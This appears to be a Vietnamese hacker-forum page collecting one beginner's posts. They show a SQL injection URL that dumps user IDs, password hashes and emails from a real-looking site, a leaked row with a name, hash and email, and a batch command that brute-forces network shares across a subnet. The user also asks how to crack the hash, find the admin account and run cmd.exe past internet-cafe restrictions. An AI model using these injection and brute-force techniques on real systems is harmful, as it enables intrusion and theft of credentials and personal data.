banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: kimsonha  XML
Profile for kimsonha Messages posted by kimsonha [ number of posts not being displayed on this page: 3 ]
 
Đây là lần đầu tiên em tập "hack",nên những gì em hỏi có thể hơi buồn cười một chút smilie) .
Em dùng SQL để truy vấn đến server, nó có dạng như sau:
http://www.server.com/path/vidu.php?show=-1'/**/UnIoN/**/SElECt/**/null,null,COnCAt(userid,',%20',username,',%20',password,',%20',email),null,null,null,null,null/**/FroM/**/bb1_users/* 

Và đây là những gì em nhận được:


Xin được trich dẫn một đoạn:

Thomas, 4a1043b4bc266b3712d3268c34e65673, le-maestro@web.de Google | Wikipedia Nein Ja  

Trong đó: Thomas la ID , 4a1043b4bc266b3712d3268c34e65673 chắc là pass đã được mã hóa (em vẫn chưa biết giải mã ra sao?) còn maestro@web.de có lẽ là email. Vấn đề là trong muôn ngàn cái ID như vậy làm sao biết cái nào của Admin,hay là em phải thử login vào từng cái một smilie
Cái này thì bạn chỉ cần đổi tên ứng dụng cấn chạy thôi.
Thế không có ai chỉ gium mechk à !
Thank mấy bác!
Mấy cha ở quantrimang viết bài tệ thật,dùng tôl riêng để bẻ khóa thì phải nói rõ làm em cứ tưởng là lệnh trong DOS.
Gởi L0ng3ta: em tưởng là em copy bị sai nhưng hóa ra không phải ,chổ
C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt
đúng là "nat" chứ không phải là "net use" đâu. Vậy "nat" là lệnh gì vậy anh. Anh có thể vao trang quantrimang.com để xem cho rõ ,đó là bài "Hacking PC resource share - Hướng đi và giải pháp "


Vâng cái đó em cpoy ra nên bị lỗi như vậy, nhưng ý em muốn hỏi là đoạn trước kìa:
FOR /F %i IN (1,1,254) DO
Cái đó đó,anh làm ơn giải thích các tham số như FOR, /F.%i,IN và cả (1,1,25400 nghĩa là gì vậy ạ!
Em cũng có một số kiến thức về Dos,nhueng câu lệnh này thì em honk hiểu lắm mong mấy bác chỉ giúp em mấy tham số trong câu lệnh này

"Vậy máy x.x.x.x s? có 2 username là : ADMIN va BODY
Khi dã có username hacker s? ti?n hành Crack password ( d?a vào các tool nhu : pqwak,xIntruder) Ho?c Hacker s? ti?n hành t?o ra m?t t? di?n ( d?a vào kh? nang phán doán c?a hacker ) tên là : pass.txt


CODE


“” ADMIN
123456 ADMIN
123456 BODY
“” BODY



Sau dó hacker crack bang l?nh :
[/CODE]Cung có th? t?o Userlist.txt và passlist.txt r?i dùng l?nh:


CODE


C:\> FOR /F %i IN (1,1,254) DO nat –u userlist.txt –p passlist.txt x.x.x.x.%I>>output.txt "


Ở quán Net khi em ngồi máy 1 và tao thư mục Test trong ổ LUU thì khi chuyển sang máy 2 vào ổ LUU thì thủ muc Test em vừa tạo vẫn xuất hiện.
Vậy cho em hỏi đây có phải là môt dạng Share ko?
Giả sử em có hai máy tính thì làm thế nào để có được tình trạng như trên.
Điều đó chỉ xảy ra voi ổ đĩa LUU
Xin lỗi mấy bác ,nhưng em là người mới nhìn đoạn code đó mà chẳng hiểu gì cả,mấy bác chỉ rõ cách dùng được không ạ !
Cảm ơn bác L0ng3ta nhưng tạo shortcut á, nó ra như thế này đây


Còn đoạn java của bác em bó tay luôn.
Con rlove :đổi tên á ,làm được ,cảm ơn bác .
Thank all! HVA dúng la nơi dáng để bỏ tiền lướt web. smilie)
Tui cũng đã thử chạy cmd bằng cách vào Programs/Accessories/Commamd Pronpt rùi,nhưng cửa sổ chương trình hiện ra rùi cũng biến ngay thôi smilie-)) Thế mói đau! Tui cho rằng nếu can thiệp dược vào CMS thì mới mở được!
Bác Z0rrO nói vậy thì ác em quá, bác hỏi quyền quản trị á, có ai ra hàng Net chơi mà nắm quyền quản trị đâu,vấn đề là em muốn chạy cmd.exe kìa.Hàng net không cho chẳng lẽ lại bó tay! HVA chẳng lẽ lại bó tay sao?
Ở hàng Net .khi cài EasyCafe thì chay Cmd bình thường nhung khi chuyển sang cài CMS thì không thể chạy dược CMD. Vậy cho em hỏi vấn đề là do CMS phải không ,nếu phải xin hương dẫn cach chạy CMD bình thường
 
Go to Page:  First Page Page 1

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|